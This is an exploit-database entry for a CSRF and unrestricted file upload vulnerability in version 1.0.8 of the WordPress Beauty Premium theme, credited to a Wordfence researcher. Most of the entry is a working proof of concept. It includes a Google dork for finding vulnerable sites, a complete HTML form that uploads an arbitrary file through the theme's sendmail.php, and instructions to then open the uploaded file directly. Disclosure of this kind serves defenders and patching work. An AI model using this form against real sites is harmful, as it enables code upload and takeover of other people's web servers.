Wordpress Beauty Theme File Upload Vulnerability v1.0.8

vendor:

Beauty Premium Theme

by:

Colette Chamberland (Wordfence)

7,5

CVSS

HIGH

CSRF and File Upload Vulnerability

264

CWE

Product Name: Beauty Premium Theme

Affected Version From: 1.0.8

Affected Version To: 1.0.8

Patch Exists: YES

Related CWE: N/A

CPE: a:yourinspirationweb:beauty_premium_theme

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Wordpress 4.2.x-4.4.x

2016

WordPress Beauty Theme File Upload Vulnerability v1.0.8

The Beauty Premium theme contains a contact form that is vulnerable to CSRF and File Upload vulnerability in the sendmail.php file. The file attachment gets uploaded to the wordpress upload directory and it is not sanitized, allowing attackers to upload harmful code.

Mitigation:

Ensure that all file uploads are properly sanitized and validated before being accepted.

Source

Exploit-DB raw data:

* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
 
Description
================================================================================
 The Beauty Premium theme contains a contact form that is vulnerable to CSRF
 and File Upload vulnerability in the sendmail.php file. The file attachment
 gets uploaded to the wordpress upload directory and it is not sanitized,
 allowing attackers to upload harmful code. 
 
 
PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:

<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" />			</li>
</form>

You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.